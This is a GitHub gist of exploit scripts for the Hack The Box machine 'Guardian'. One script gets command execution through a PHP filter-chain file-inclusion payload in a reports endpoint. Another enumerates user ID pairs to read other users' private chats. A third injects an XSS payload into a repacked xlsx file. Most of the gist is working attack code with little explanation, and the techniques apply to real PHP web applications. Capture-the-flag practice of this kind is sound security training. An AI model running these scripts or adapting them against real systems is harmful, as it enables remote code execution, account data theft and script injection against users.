Skip to content

Instantly share code, notes, and snippets.

@sharpicx
Last active November 8, 2025 06:32
Show Gist options
  • Save sharpicx/d0a5d1d7af54c733cf9875c8f146631a to your computer and use it in GitHub Desktop.
Save sharpicx/d0a5d1d7af54c733cf9875c8f146631a to your computer and use it in GitHub Desktop.
HTB: Guardian
import requests
from bs4 import BeautifulSoup
from pwn import log
import sys, string
def exec(data):
payload = "http://portal.guardian.htb/admin/reports.php?report=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://tempfinancial.php&0="
COOKIE = {
"PHPSESSID": "d4bbvc2v9n41tts9jtqn2ef1g7",
}
r = requests.get(payload + data, cookies=COOKIE)
soup = BeautifulSoup(r.text, "html.parser")
inner_div = soup.find("div", class_="grid")
raw_sibling = inner_div.next_sibling
text_abc = raw_sibling.strip()
cleaned = "".join(filter(lambda char: char in string.printable, text_abc))
return cleaned.replace("$)C@C>==@C>==@C>==@C>==@C>==@", "")
if __name__ == "__main__":
if len(sys.argv) != 2:
log.warning(f"usage: {sys.argv[0]} <cmd>")
exit()
cmd = sys.argv[1]
log.success(exec(cmd)
import requests
from bs4 import BeautifulSoup
from pwn import log
COOKIE = {
"PHPSESSID": "9dag3546f0bc1mq3luo10r3gaa",
}
RED = "\033[91m"
CYAN = "\033[96m"
RESET = "\033[0m"
for i in range(1, 50):
for b in range(1, 50):
TARGET = (
"http://portal.guardian.htb/student/chat.php?chat_users[0]=%d&chat_users[1]=%d"
% (i, b)
)
response = requests.get(TARGET, cookies=COOKIE).text
soup = BeautifulSoup(response, "html.parser")
for bubble in soup.select(".chat-bubble"):
header = bubble.select_one(".text-sm.text-gray-500.mb-1")
body = bubble.select_one(".text-gray-800")
if not header or not body:
continue
sender = header.contents[0].strip()
message = bubble.select_one(".text-gray-800").get_text(strip=True)
log.success(f"{RED}{sender}{RESET}: {CYAN}{message}{RESET}")
from pwn import log
import os
import html
import sys
import re
import zipfile
if __name__ == "__main__":
if len(sys.argv) != 3:
log.info(f"usage: {sys.argv[0]} <xlsx> <payload>")
exit(1)
folder_name = ""
xslx_file = sys.argv[1]
if os.path.isfile(xslx_file) and xslx_file.lower().endswith(".xlsx"):
folder_name = os.path.splitext(os.path.basename(xslx_file))[0]
os.makedirs(folder_name, exist_ok=True)
with zipfile.ZipFile(xslx_file, "r") as zip_ref:
zip_ref.extractall(folder_name)
log.success(f"Extracted {xslx_file} to {folder_name}")
search_term = "sharpicx"
script = sys.argv[2]
script = f'">{script}'
replaced_term = html.escape(script)
for subdir, _, files in os.walk(folder_name):
for file in files:
file_path = os.path.join(subdir, file)
try:
with open(file_path, "r", encoding="utf-8") as f:
content = f.read()
if search_term.lower() in content.lower():
pattern = re.compile(re.escape(search_term), re.IGNORECASE)
new_content = pattern.sub(replaced_term, content)
with open(file_path, "w", encoding="utf-8") as f:
f.write(new_content)
log.success(f"Updated: {file_path}")
except Exception:
continue
os.system(
f"cd {folder_name}; zip -r ./Book1.xlsx *; mv Book1.xlsx ../Book1_modifed.xlsx; cd ..; rm -rf Book1"
)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment